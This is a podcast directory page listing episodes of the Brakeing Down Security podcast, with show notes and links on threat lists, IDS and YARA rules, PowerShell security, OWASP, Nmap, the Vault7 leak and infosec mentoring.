Cover image of Brakeing Down Security Podcast
(79)

Rank #31 in Tech News category

Technology
News
Tech News

Brakeing Down Security Podcast

Updated about 17 hours ago

Rank #31 in Tech News category

Technology
News
Tech News
Read more

A podcast all about the world of Security, Privacy, Compliance, and Regulatory issues that arise in today's workplace. Co-hosts Bryan Brake, Brian Boettcher, and Amanda Berlin teach concepts that aspiring Information Security Professionals need to know, or refresh the memories of the seasoned veterans.

Read more

A podcast all about the world of Security, Privacy, Compliance, and Regulatory issues that arise in today's workplace. Co-hosts Bryan Brake, Brian Boettcher, and Amanda Berlin teach concepts that aspiring Information Security Professionals need to know, or refresh the memories of the seasoned veterans.

iTunes Ratings

79 Ratings
Average Ratings
68
6
4
0
1

Great Security Pod

By The Drewsk - Oct 05 2018
Read more
Great security podcast even for non-security IT folks. Give it a listen!

Amazing!

By elliott2k - Jun 21 2017
Read more
I love the podcast and the community behind it. Much love! 10/10

iTunes Ratings

79 Ratings
Average Ratings
68
6
4
0
1

Great Security Pod

By The Drewsk - Oct 05 2018
Read more
Great security podcast even for non-security IT folks. Give it a listen!

Amazing!

By elliott2k - Jun 21 2017
Read more
I love the podcast and the community behind it. Much love! 10/10
Cover image of Brakeing Down Security Podcast

Brakeing Down Security Podcast

Latest release on Jan 13, 2020

Read more

A podcast all about the world of Security, Privacy, Compliance, and Regulatory issues that arise in today's workplace. Co-hosts Bryan Brake, Brian Boettcher, and Amanda Berlin teach concepts that aspiring Information Security Professionals need to know, or refresh the memories of the seasoned veterans.

Rank #1: 2019-009- Log-MD story, Noid, communicating with Devs and security people-part1

Podcast cover
Read more

Log-MD story (quick one) (you’ll like this one, Mr. Boettcher)

    SeaSec East meetup

    "Gabe"

https://www.sammamish.us/government/departments/information-technology/ransomware-attack-information-hub/

New Slack Moderator (@cherokeeJB)

Shoutout to “Jerry G”

Mike P on Slack: https://www.eventbrite.com/e/adversary-tactics-red-team-operations-training-course-dc-april-2019-tickets-54735183407

www.Workshopcon.com/events and that we're looking for BlueTeam trainers please

Any chance you can tag @workshopcon. SpecterOps and lanmaster53 when you post on Twitter and we'll retweet

Noid - @_noid_

noid23@gmail.com

Bsides Talk (MP3) - https://github.com/noid23/Presentations/blob/master/BSides_2019/Noid_Seattle_Bsides.mp3

Slides (PDF)

https://github.com/noid23/Presentations/blob/master/BSides_2019/Its%20Not%20a%20Bug%20Its%20a%20Feature%20-%20Seattle%20BSides%202019.pdf

Security view was a bit myopic?

“What do we win by playing?”

Cultivating relationships (buy lunch, donuts, etc)

Writing reports

Communicating findings that resonate with developers and management

    Often pentest reports are seen by various facets of folks

    Many levels of competency (incompetent -> super dev/sec)

Communicating risk? Making bugs make sense to everyone…

The three types of power:

https://www.manager-tools.com/2018/03/three-types-power-and-one-rule-them-part-1

Check out our Store on Teepub! https://brakesec.com/store

Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email bds.podcast@gmail.com

#Brakesec Store!:https://www.teepublic.com/user/bdspodcast

#Spotify: https://brakesec.com/spotifyBDS

#RSS: https://brakesec.com/BrakesecRSS

#Youtube Channel:  http://www.youtube.com/c/BDSPodcast

#iTunes Store Link: https://brakesec.com/BDSiTunes

#Google Play Store: https://brakesec.com/BDS-GooglePlay

Our main site:  https://brakesec.com/bdswebsite

#iHeartRadio App:  https://brakesec.com/iHeartBrakesec

#SoundCloud: https://brakesec.com/SoundcloudBrakesec

Comments, Questions, Feedback: bds.podcast@gmail.com

Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon

https://brakesec.com/BDSPatreon

#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir

#Player.FM : https://brakesec.com/BDS-PlayerFM

#Stitcher Network: https://brakesec.com/BrakeSecStitcher

#TuneIn Radio App: https://brakesec.com/TuneInBrakesec

Mar 12 2019

51mins

Play

Rank #2: 2017-002: Threat Lists, IDS/IPS rules, and mentoring

Podcast cover
Read more

In your environment, you deal with threats from all over the world. Many groups out there pool resources to help everyone deal with those #threats. Some come in the form of threat #intelligence from various intelligence companies, like #Carbon #Black, #FireEye, and #Crowdstrike.

But what if your company cannot afford such products, or are not ready to engage those types of companies, and still need need protections? Never fear, there are open source options available (see show notes below). These products aren't perfect, but they will provide a modicum of protection from 'known' bad actors, SSH trolls, etc.

We discuss some of the issues using them, discuss how to use them in your #environment.

Lastly, we discuss #mentorship. Having a good mentor/mentee relationship can be mutally beneficial to both parties. We discuss what it takes to be a good mentee, as well as a good mentor...

RSS: www.brakeingsecurity.com/rss

Direct Download: http://traffic.libsyn.com/brakeingsecurity/2017-002-mentoring_threat_lists.mp3

iTunes:  https://itunes.apple.com/us/podcast/2017-002-threat-lists-ids/id799131292?i=1000380246554&mt=2

YouTube: https://www.youtube.com/watch?v=oHNrINl1oZE

----------

HITB announcement:

“Tickets are on sale, And entering special code 'brakeingsecurity' at checkout gets you a 10% discount". Brakeing Down Security thanks #Sebastian Paul #Avarvarei and all the organizers of #Hack In The Box (#HITB) for this opportunity! You can follow them on Twitter @HITBSecConf. Hack In the Box will be held from 10-14 April 2017. Find out more information here: http://conference.hitb.org/hitbsecconf2017ams/

---------

Join our #Slack Channel! Sign up at https://brakesec.signup.team #RSS: http://www.brakeingsecurity.com/rss #Google Play Store: https://play.google.com/music/m/Ifp5boyverbo4yywxnbydtzljcy?t=Brakeing_Down_Security_podcast #SoundCloud: https://www.soundcloud.com/bryan-brake Comments, Questions, Feedback, or Suggestions?  Contact us via Email: bds.podcast@gmail.com #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Facebook: https://www.facebook.com/BrakeingDownSec/ #Tumblr: http://brakeingdownsecurity.tumblr.com/ #Player.FM : https://player.fm/series/brakeing-down-security-podcast #Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr #TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582

----------

Show Notes:

HANGOUTS:  https://hangouts.google.com/call/w7rkkde5yrew5nm4n7bfw4wfjme

2017-002-Threat Lists, IDS/IPS rulesets, and infosec mentoring

  1. Threat Lists (didn’t have much time to research :/)
    1. THIS EXACTLY - http://blogs.gartner.com/anton-chuvakin/2014/01/28/threat-intelligence-is-not-signatures/   
      1. Don’t use threat list feeds (by IP/domain) as threat intelligence
      2. Can use them for aggressively blocking, don’t use for alerting
    2. https://isc.sans.edu/suspicious_domains.html
    3. https://rules.emergingthreats.net/fwrules/emerging-Block-IPs.txt
    4. http://iplists.firehol.org/
    5. https://zeltser.com/malicious-ip-blocklists/
    6. https://medium.com/@markarenaau/actionable-intelligence-is-it-a-capability-problem-or-does-your-intelligence-provider-suck-d8d38b1cbd25#.ncpmqp9cx
    7. Spamhaus: https://www.spamhaus.org/
    8. leachers
    1. Open rulesets - You can always depend on the kindness of strangers
      1. Advantage is that these are created by companies that have worldwide reach
      2. Updated daily
      3. Good accompanying documentation
    2. You can buy large rulesets to use in your own IDS implementation
      1. Depends on your situation if you want to go managed or do yourself
      2. Regardless you need to test them
    3. Managed security services will do this for you
      1. I don’t recommend unless you have a team of dedicated people or you don’t care about getting hacked- signatures are way too dynamic, like trying to do AV sigs all by yourself
      2. Only a good idea for one-off, targeted attacks
    4. DIY
  2. IDS/IPS rulesets
    1. https://securityintelligence.com/signature-based-detection-with-yara/
    2. http://yararules.com/
    3. http://resources.infosecinstitute.com/yara-simple-effective-way-dissecting-malware/
  3. Yara rules
    1. For Mentors
      1. Set expectations & boundaries
      2. Find a good fit
      3. Be an active listener
      4. Keep open communication
      5. Schedule time
      6. Create homework
      7. Don’t assume technical level
      1. Ask questions
      2. Do your own research
      3. Find a good fit
      4. Put forth effort
      5. It’s not the Mentor’s job to handhold, take responsibility for own learning
      6. Value their time
      7. Come to each meeting with an agenda
    2. For Mentees
    3. Mentoring frameworks?
  4. InfoSec Mentoring
    1. https://t.co/mLXjfF1HEr
    2. https://gist.github.com/AFineDayFor/5cdd0341a2b384c20e615dcedeef0741
  5. Podcasts (Courtesy of Ms. Hannelore)
    1. https://t.co/mLXjfF1HEr
    2. https://gist.github.com/AFineDayFor/5cdd0341a2b384c20e615dcedeef074

Jan 21 2017

1hr 5mins

Play

Rank #3: Reconnaissance: Finding necessary info during a pentest

Podcast cover
Read more

I had a healthy debate with Mr. Boettcher this week about the merits of doing recon for a pentest. Mr. Boettcher is a heavy duty proponent of it, and I see it as a necessary evil, but not one that I consider important.  We hash it out, and find some common ground this week.

People search links:

Spokeo - http://www.spokeo.com/

Pipl - https://pipl.com/

Sec Filings site: http://www.sec.gov/edgar/searchedgar/webusers.htm

Intro "Private Eye", transition "Mining by Moonlight", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com) Licensed under Creative Commons: By Attribution 3.0http://creativecommons.org/licenses/by/3.0/

Aug 25 2014

48mins

Play

Rank #4: 2016-015-Dr. Hend Ezzeddine, and changing organizational security behavior

Podcast cover
Read more

Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-015-Dr._Hend_Ezzeddine_and_finding_security_training_that_works.mp3

iTunes Link: https://itunes.apple.com/us/podcast/2016-015-dr.-hend-ezzeddine/id799131292?i=366936677&mt=2

Dr. Ezzeddine's slides from Bsides Austin (referenced during the interview): https://drive.google.com/file/d/0B-qfQ-gWynwiQnBXMnJVeko4M25pdk1Sa0JnMGJrZmltWlRr/view?usp=sharing

You open the flash animation, click click click, answer 10 security questions that your 5 year old could answer, get your certificate of completion... congratulations, you checked the compliance box...

But what did you learn in that training? If you can't remember the next day, maybe it's because the training failed to resonate with you?

Have you ever heard red team #pentester say that the weakest link in any business is not the applications, or the hardware, but the people? If they can't find a vulnerability, the last vulnerability is the people. One email with a poisoned .docx, and you have a shell into a system...

Targeted trainings, and the use of certain styles of #training (presentations, in-person, hand puppets, etc) can be more effective for certain groups. Also, certain groups should have training based on the threat they might be susceptible to...

Dr. Hend #Ezzeddine came by this week to discuss how she helps #organizations get people to understand security topics and concepts, to create a positive security culture. Maybe even a culture that will not click on that attachment...

**If you are planning on attending "Hack In The Box" in Amsterdam, The Netherlands on 23-27 May 2016, you can receive a 10% discount by entering 'brakesec' at checkout.

Get more information at the "Hack In The Box" conference by visiting:

http://conference.hitb.org/hitbsecconf2016ams/

Comments, Questions, Feedback: bds.podcast@gmail.com

Support Brakeing Down Security using Patreon: https://www.patreon.com/bds_podcast

RSS FEED: http://www.brakeingsecurity.com/rss

On #Twitter: @brakesec @boettcherpwned @bryanbrake @hackerhurricane

#Facebook: https://www.facebook.com/BrakeingDownSec/

#Tumblr: http://brakeingdownsecurity.tumblr.com/

Google Play Store: https://play.google.com/music/podcasts/portal/#p:id=playpodcast/series&a=100584969

Player.FMhttps://player.fm/series/brakeing-down-security-podcast

Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr

TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/

Apr 16 2016

1hr 10mins

Play

Rank #5: 2015-022: SANS Top 25 Critical Security Controls-#10 and #11

Podcast cover
Read more

When you're working with network infrastructure, there's a real need for proper configuration management, as well as having a proper baseline to work from.

Mr. Boettcher and I continue through the SANS Top25 Critical Security Controls. #10 and #11 are all dealing with network infrastructure. Proper patches, baselines for being as secure as possible. Since your company's ideal security structure needs to be a 'brick', and not an 'egg'.

May 17 2015

56mins

Play

Rank #6: 2017-009-Dave Kennedy talks about CIAs 'Vault7', ISC2, and Derbycon updates!

Podcast cover
Read more

Wikileaks published a cache of documents and information from what appears to be a wiki from the Central Intelligence Agency (CIA).

This week, we discuss the details of the leak (as of 11Mar 2017), and how damaging it is to blue teamers.

To help us, we asked Mr. Dave Kennedy  (@hackingDave) to sit down with us and discuss what he found, and his opinions of the data that was leaked. Mr. Kennedy is always a great interview, and his insights are now regularly seen on Fox Business News, CNN, and MSNBC.

Dave isn't one to rest on his laurels. For many of you, you know him as the co-organizer of #derbycon, as well as a board member of #ISC2.  We ask him about initiatives going on with ISC2, and how you (whether or not you're a ISC2 cert holder). You can help with various committees and helping to improve the certification landscape. We talk about how to get involved.

We finish up asking about the latest updates to DerbyCon, as well as the dates of tickets, and we talk about our CTF for a free ticket to DerbyCon.

Direct Link: http://traffic.libsyn.com/brakeingsecurity/2017-009-dave_kennedy_vault7_isc2_derbycon_update.mp3

Youtube:  https://www.youtube.com/watch?v=lqXGGg7-BlM

iTunes: https://itunes.apple.com/us/podcast/2017-009-dave-kennedy-talks-abotu-cias-vault7-isc2/id799131292?i=1000382638971&mt=2

#Bsides #London is accepting Call for Papers (#CFP) starting 14 Febuary 2017, as well as a Call for Workshops. Tickets are sold out currently, but will be other chances for tickets. Follow @bsidesLondon for more information. You can find out more information at https://www.securitybsides.org.uk/

CFP closes 27 march 2017

------

HITB announcement:

“Tickets are on sale, And entering special code 'brakeingsecurity' at checkout gets you a 10% discount". Brakeing Down Security thanks #Sebastian Paul #Avarvarei and all the organizers of #Hack In The Box (#HITB) for this opportunity! You can follow them on Twitter @HITBSecConf. Hack In the Box will be held from 10-14 April 2017. Find out more information here: http://conference.hitb.org/hitbsecconf2017ams/

---------

Join our #Slack Channel! Sign up at https://brakesec.signup.team #RSS: http://www.brakeingsecurity.com/rss #Google Play Store: https://play.google.com/music/m/Ifp5boyverbo4yywxnbydtzljcy?t=Brakeing_Down_Security_podcast

iHeartRadio App:  https://www.iheart.com/show/263-Brakeing-Down-Securi/

SoundCloud: https://www.soundcloud.com/bryan-brake

Comments, Questions, Feedback: bds.podcast@gmail.com

Support Brakeing Down Security Podcast on #Patreon: https://www.patreon.com/bds_podcast

#Twitter: @brakesec @boettcherpwned @bryanbrake

#Player.FMhttps://player.fm/series/brakeing-down-security-podcast

#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr

#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/

--show notes--

http://www.bbc.com/news/world-us-canada-10758578

WL: “CIA ‘hoarded’ vulnerabilities or ‘cyber-weapons’

    Should they not have tools that allow them to infiltrate systems of ‘bad’ people?

    Promises to share information with manufacturers

        BrBr- Manufacturers and devs are the reason the CIA has ‘cyber-weapons’

            Shit code, poor software design/architecture

            Security wonks aren’t without blame here either

http://www.bbc.com/news/technology-39218393  -RAND report

        Report suggested stockpiling is ‘good’

            “On the other hand, publicly disclosing a vulnerability that isn't known by one's adversaries gives them the upper hand, because the adversary could then protect against any attack using that vulnerability, while still keeping an inventory of vulnerabilities of which only it is aware of in reserve.”

Encryption does still work, in many cases… as it appears they are having to intercept the data before it makes it into secure messaging systems…  

http://abcnews.go.com/Technology/wireStory/cia-wikileaks-dump-tells-us-encryption-works-46045668

(somewhat relevant? Not sure if you want to touch on https://twitter.com/bradheath/status/837846963471122432/photo/1)

Wikileaks - more harm than good?

    Guess that depends on what side you’re on

    What side is Assange on? (his own side?)

    Media creates FUD because they don’t understand

        Secure messaging apps busted (fud inferred by WL)

            In fact, data is circumvented before encryption is applied.

Some of the docs make you wonder about the need for ‘over-classification’

Vulnerabilities uncovered

Samsung Smart TVs “Fake-Off”

Tools to exfil data off of iDevices

    BrBr- Cellbrite has sold that for years to the FBI

        CIA appears to only have up to iOS 9 (according to docs released)

Car hacking tech

Sandbox detection (notices mouse clicks or the lack of them)

    Reported by eEye: https://wikileaks.org/ciav7p1/cms/page_2621847.html

Technique: Process Hollowing: https://wikileaks.org/ciav7p1/cms/page_3375167.html

    Not new: https://attack.mitre.org/wiki/Technique/T1093

anything Mr. Kennedy feels is important to mention

What can blue teamers do to protect themselves?

    Take an accounting of ‘smart devices’ in your workplace

        Educate users on not bringing smart devices to work

            And at home (if they are remote)

                Alexa,

        Restrict smart devices in sensitive areas

            SCIFs, conference rooms, even in ‘open workplace’ areas

    Segment possibly affected systems from the internet

    Keep proper inventories of software used in your environment

    Modify IR exercises to allow for this type of scenario?

    Reduce ‘smart’ devices

        Grab that drill and modify the TV in the conference room

        Cover the cameras on TV

            Is that too paranoid?

        Don’t setup networking on smart devices or use cloud services on ‘smart’ devices

    Remind devs that unpatched or crap code can become the next ‘cyber-weapon’ ;)

Mar 14 2017

1hr 15mins

Play

Rank #7: 2015-023_Get to know a Security Tool: Security Onion!

Podcast cover
Read more

Having a more secure network by deploying tools can be no easy task. This week, we show you a tool, Security Onion, that can give you an IDS and log analysis tool in less than 20 minutes.

 http://blog.securityonion.net/p/securityonion.html

May 26 2015

37mins

Play

Rank #8: 2017-042-Jay beale, Hushcon, Apple 0Day, and BsidesWLG audio

Podcast cover
Read more

Ms. Berlin and Mr. Boettcher are on holiday this week, and I (Bryan) went to Hushcon (www.hushcon.com) last week (8-9 Dec 2017). Lots of excellent discussion and talks.

While there, our friend Jay Beale (@jaybeale) came on to discuss Hushcon, as well as some recent news. 

Google released an 0day for Apple iOS, and we talk about how jailbreaking repos seem to be shuttering, because there have not been as many as vulns found to allow for jailbreaking iDevices.

We also went back and discussed some highlights of the DFIR hierarchy show last week (https://brakesec.com/2017-041) and some of the real world examples of someone who has seen it on a regular basis. Jay's insights are something you shouldn't miss

Finally, Ms. Berlin went to New Zealand and gave a couple of talks at Bsides Wellington (@bsideswlg). She interviewed Chris Blunt (https://twitter.com/chrisblunt) and "Olly the Ninja" (https://twitter.com/Ollytheninja) about what makes a good con. 

Direct Link: https://brakesec.com/2017-042

*NEW* we are now on Spotify!: https://brakesec.com/spotifyBDS

RSS: https://brakesec.com/BrakesecRSS

Youtube Channel:  http://www.youtube.com/c/BDSPodcast

#iTunes Store Link: https://brakesec.com/BDSiTunes

#Google Play Store: https://brakesec.com/BDS-GooglePlay

Our main site:  https://brakesec.com/bdswebsite

Join our #Slack Channel! Sign up at 

https://brakesec.com/Dec2017BrakeSlack

or DM us on Twitter, or email us.

#iHeartRadio App:  https://brakesec.com/iHeartBrakesec

#SoundCloud: https://brakesec.com/SoundcloudBrakesec

Comments, Questions, Feedback: bds.podcast@gmail.com

Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon

https://brakesec.com/BDSPatreon

#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir

#Player.FMhttps://brakesec.com/BDS-PlayerFM

#Stitcher Network: https://brakesec.com/BrakeSecStitcher

#TuneIn Radio App: https://brakesec.com/TuneInBrakesec

From our friends at Hack In the Box Amsterdam:

"We are gearing up for the Hack In The Box Amsterdam 2018, which is now on its 9th edition, and will take place between the 9th and 13th April at the same venue as last year, the Grand Krasnapolsky hotel in the center of Amsterdam: https://conference.hitb.org/hitbsecconf2018ams/ The list of trainings is already published and looking as awesome as ever: https://conference.hitb.org/hitbsecconf2018ams/training .  The CFP is open and the review board is already hard at work with the first submissions."     "If you have an interesting security talk and fancy visiting Amsterdam in the spring, then submit your talk to the Hack In The Box Amsterdam conference, which will take place between 9 and 13 April 2018. The Call For Papers is open until the end of December, submission details can be found at https://cfp.hackinthebox.org/. Tickets are already on sale, with early bird prices until December 31st. And the 'brakeingsecurity' discount code gets you a 10% discount".

--Show Notes--

https://github.com/int0x80/githump

http://ptrarchive.com/

https://hunter.io/

https://www.data.com/

https://techcrunch.com/2017/11/27/ios-jailbreak-repositories-close-as-user-interest-wanes/

https://securelist.com/unraveling-the-lamberts-toolkit/77990/

Dec 16 2017

1hr 6mins

Play

Rank #9: 2016-021: Carbon Black's CTO Ben Johnson on EDR, the layered approach, and threat intelligence

Podcast cover
Read more

Ben Johnson (@chicagoben on Twitter) has spent a good deal of time working on protecting client's endpoints. From his work at the NSA, to being the co-founder of Carbon Black (@carbonblack_inc).

We managed to have him on to discuss EDR (#Endpoint Detection and Response), TTP (#Tactics, Techniques, and Procedures), and #Threat #Intelligence industry.

Ben discusses with us the Layered Approach to EDR:

1. Hunting

2. Automation

3. Integration

4. Retrospection

5. Patterns of Attack/Detection

6. indicator-based detection

7. Remediation

8. Triage

9. Visibility

We also discuss how VirusTotal's changes in policy regarding sharing of information is going to affect the threat intel industry.

Ben also discusses his opinion of our "Moxie vs. Mechanisms" podcast, where businesses spend too much on shiny boxes vs. people.

Brakesec apologizes for the audio issues during minute 6 and minute 22. Google Hangouts was not kind to us :(

Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-021-Ben_Johnson-Carbon_black-Threat_intelligence.mp3

iTunes: https://itunes.apple.com/us/podcast/2016-021-carbon-blacks-cto/id799131292?i=1000369579669&mt=2

YouTube: https://youtu.be/I10R3BeGDs4

RSS: http://www.brakeingsecurity.com/rss

Show notes: https://docs.google.com/document/d/12Rn-p1u13YlmOORTYiM5Q2uKT5EswVRUj4BJVX7ECHA/edit?usp=sharing (great info)

https://roberthurlbut.com/blog/make-threat-modeling-work-oreilly-2016

Comments, Questions, Feedback: bds.podcast@gmail.com

Support Brakeing Down Security Podcast on Patreon: https://www.patreon.com/bds_podcast

#Twitter: @brakesec @boettcherpwned @bryanbrake

#Facebook: https://www.facebook.com/BrakeingDownSec/

#Tumblr: http://brakeingdownsecurity.tumblr.com/

Player.FMhttps://player.fm/series/brakeing-down-security-podcast

#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr

#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/

May 29 2016

57mins

Play

Rank #10: 2019-038- Ethical dilemmas with offensive tools, powershell discussion with Lee Holmes - Part2

Podcast cover
Read more

Derbycon9 talk - PowerShell Security Looking Back from the Inside - https://www.youtube.com/watch?v=DYWPtt7qszY&list=PLNhlcxQZJSm_ZDJBksg97I5q1XsdQcyN5&index=27&t=0s

Encarta - https://en.wikipedia.org/wiki/Encarta

Scott Hanselman’s twitter thread about Encarta: https://twitter.com/shanselman/status/1158780839464849409

Congrats on the black badge :)

I like that you bring up execution policies. That it was never created to become a security control

  • I started alerting on it anyway at least from non-admin devices

https://www.mssqltips.com/sqlservertip/2702/setting-the-powershell-execution-policy/

Want to learn Powershell? UnderTheWire wargame: https://underthewire.tech/

Jeffrey Snover “The Cultural battle to remove Windows from Windows Server”: https://www.youtube.com/watch?v=3Uvq38XOark

You talk about “why would anyone want to remove powershell” as it came as a standalone download and part of the windows sdk. - I was taught when I was just getting into tech, that I should fear powershell and didn’t realize how powerful it could be as an admin because of it.

Powershell slime trail <3 (powershell transparency)

“You can’t force a powerful tool only to be used how you want it to be used, you can tilt the playing field on behalf of defenders”

If an attacker is going to use powershell, let’s make them regret it

Powershell has had quite an impact and history.

My own sorry logging/alerting attempts

You mentioned the amount of attacks listed in MITRE that use powershell, is that *the* recommended resource for blue teamers, are there any others?

Revoke-Obfuscation white paper (blackhat2017): https://www.blackhat.com/docs/us-17/thursday/us-17-Bohannon-Revoke-Obfuscation-PowerShell-Obfuscation-Detection-And%20Evasion-Using-Science-wp.pdf

https://github.com/danielbohannon/Invoke-Obfuscation

https://github.com/danielbohannon/Revoke-Obfuscation

https://blog.trendmicro.com/trendlabs-security-intelligence/ransomware-now-uses-windows-powershell/

https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/TROJ_POSHCODER.A

Ever thought of writing a powershell security sentric book? Bill Pollock was looking for someone to write a book for NoStarch…

Derbycon keynote with Lee Holmes and Jeffrey Snover - http://www.irongeek.com/i.php?page=videos/derbycon6/101-key-note-jeffrey-snover-lee-holmes

AMSI - Antimalware Scan Interface: https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal

https://www.amazon.com/dp/B00ARN9MEK/ref=dp-kindle-redirect?_encoding=UTF8&btkr=1 -  Windows Powershell cookbook

Eric conrad: https://www.ericconrad.com/2016/09/deepbluecli-powershell-module-for-hunt.html

https://github.com/sans-blue-team/DeepBlueCLI

Daniel Bohannon - DevSec Defense - https://www.youtube.com/watch?v=QJe8xikf-iE

https://github.com/psconfeu/2018/tree/master/Daniel%20Bohannon/DevSec%20Defense

Constrained language mode: https://devblogs.microsoft.com/powershell/powershell-constrained-language-mode/

Maslow’s security Hierarchy: https://www.leeholmes.com/blog/2014/12/08/maslows-hierarchy-of-security-controls/

Just Enough Administration: https://docs.microsoft.com/en-us/previous-versions//dn896648(v=technet.10)?redirectedfrom=MSDN

https://github.com/infosecn1nja/AD-Attack-Defense

Also - DrawOnMyBadge.com - Super cool idea, loved the mona lisa

@Lee_Holmes

@hackershealth

@log-md

@infosecCampout

@seasecEast

@brakesec

@bryanbrake

@boettcherpwned

@Infosystir

@packscott

@dpcybuck

@megan_roddie

@consultingCSO

Oct 22 2019

52mins

Play

Rank #11: Episode 3 - Alerts, Events, and a bit of incident response

Podcast cover
Read more

In this issue, we talked about upcoming podcasts with Michael Gough from MI2 Security discussing malware, and this week we get into everything about alerts, why they are important, types of alerts, levels that can occur, and even a bit of incident response in handling alerts.

Intro "Private Eye" and Outro "Honeybee" created by Kevin MacLeod (incompetech.com) Licensed under Creative Commons: By Attribution 3.0http://creativecommons.org/licenses/by/3.0/

Jan 27 2014

33mins

Play

Rank #12: OWASP Top Ten: Numbers 6 - 10

Podcast cover
Read more

As we wade through the morass of the Infosec swamp, we come across the OWASP 2013 report of web app vulnerabilities. Since Mr. Boettcher and I find ourselves often attempting to explain these kinds of issues to people on the Internet and in our daily lives, we thought it would be prudent to help shed some light on these.

So this week, we discuss the lower of the top 10, the ones that aren't as glamorous or as earth shaking as XSS or SQLI, but are gotchas that will bite thine ass just as hard.

Next week is the big ones, the Top 5... all your favorites, in one place!

OWASP Top 10 (2013) PDF:  http://owasptop10.googlecode.com/files/OWASP%20Top%2010%20-%202013.pdf

Costs of finding web defects early (2008): http://www.informit.com/articles/article.aspx?p=1193473&seqNum=6

 

Intro "Private Eye", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com) Licensed under Creative Commons: By Attribution 3.0http://creativecommons.org/licenses/by/3.0/

Jun 16 2014

45mins

Play

Rank #13: OWASP Top Ten: 1-5

Podcast cover
Read more

We finished up the OWASP Top Ten List. We discussed Injection, XSS, and other goodness.  Find out what makes the Top 5 so special.

http://risky.biz/fss_idiots  - Risky Business Interview concerning Direct Object Reference and First State Superannuation

http://oauth.net/2/ - Great information on OAUTH 2.0.

 

Intro "Private Eye", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com) Licensed under Creative Commons: By Attribution 3.0http://creativecommons.org/licenses/by/3.0/

Jun 23 2014

49mins

Play

Rank #14: 2019-008-windows retpoline patches, PSremoting, underthewire, thunderclap vuln

Podcast cover
Read more

BrakeingDownIR show #10

GrumpySec appearance?

https://support.microsoft.com/en-us/help/4482887/windows-10-update-kb4482887

https://techcommunity.microsoft.com/t5/Windows-Kernel-Internals/Mitigating-Spectre-variant-2-with-Retpoline-on-Windows/ba-p/295618

https://blogs.technet.microsoft.com/srd/2018/03/15/mitigating-speculative-execution-side-channel-hardware-vulnerabilities/

“Microsoft has added support for the /Qspectre flag to Visual C++ which currently enables some narrow compile-time static analysis to identify at-risk code sequences related to CVE-2017-5753 and insert speculation barrier instructions. This flag has been used to rebuild at-risk code in Windows and was released with our January 2018 security updates. It is important to note, however, that the Visual C++ compiler cannot guarantee complete coverage for CVE-2017-5753 which means instances of this vulnerability may still exist.’

Retpoline = “Return Trampoline”

    “That’s because when using return operations, any associated speculative execution will 'bounce' endlessly.”

https://www.tomshardware.com/news/retpoline-patch-spectre-windows-10,37958.html

Cool site (Andrei) *long time podcast supporter*

UndertheWire.tech - powershell wargame

---

PSRemoting -https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/enable-psremoting?view=powershell-6

https://www.howtogeek.com/117192/how-to-run-powershell-commands-on-remote-computers/

https://blogs.technet.microsoft.com/askperf/2012/02/17/useful-wmic-queries/

Caveats:Network connection you’re on must be set to “private”, not public

WinRM service has to be enabled on both the local and remote hosts (at least, I think so --brbr)

https://www.engadget.com/2019/02/27/dow-jones-watchlist-leaked/

http://time.com/5349896/23andme-glaxo-smith-kline/

http://thunderclap.io/

https://int3.cc/products/facedancer21 -  USB

Check out our Store on Teepub! https://brakesec.com/store

Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email bds.podcast@gmail.com

#Brakesec Store!:https://www.teepublic.com/user/bdspodcast

#Spotify: https://brakesec.com/spotifyBDS

#RSS: https://brakesec.com/BrakesecRSS

#Youtube Channel:  http://www.youtube.com/c/BDSPodcast

#iTunes Store Link: https://brakesec.com/BDSiTunes

#Google Play Store: https://brakesec.com/BDS-GooglePlay

Our main site:  https://brakesec.com/bdswebsite

#iHeartRadio App:  https://brakesec.com/iHeartBrakesec

#SoundCloud: https://brakesec.com/SoundcloudBrakesec

Comments, Questions, Feedback: bds.podcast@gmail.com

Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon

https://brakesec.com/BDSPatreon

#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir

#Player.FM : https://brakesec.com/BDS-PlayerFM

#Stitcher Network: https://brakesec.com/BrakeSecStitcher

#TuneIn Radio App: https://brakesec.com/TuneInBrakesec

Mar 04 2019

56mins

Play

Rank #15: Introduction to Nmap, Part 2

Podcast cover
Read more

Here is Part 2 of our video for understanding the basics of Nmap.  I discuss some of the logging output, the scripts found in Nmap, and the output that Nmap gives you for reporting or comparison later.

I really did want to go more into the Lua portion of the scripting engine, and perhaps make a simple script, but time constraints halted that. I hope to get more adept at video creation and hopefully editing, to make a more concise video tutorial.

Nmap target specifications: http://nmap.org/book/man-target-specification.html

http://nmap.org/book/nse-usage.html

Explanation of all Nmap scripts: http://nmap.org/nsedoc/

nmap icon courtesy of insecure.org

Aug 10 2014

19mins

Play

Rank #16: the last Derbycon Brakesec podcast

Podcast cover
Read more

This evening, we all came together to spend a bit of time talking about the final Derbycon. We talk to Mic Douglas about his 9 Derbycon appearances, Gary Rimar (piano player Extraordinare) talks about @litmoose's talk on how to tell C-Levels that their applications aren't good.

We also got asked about how the show came about, and how we found each other.

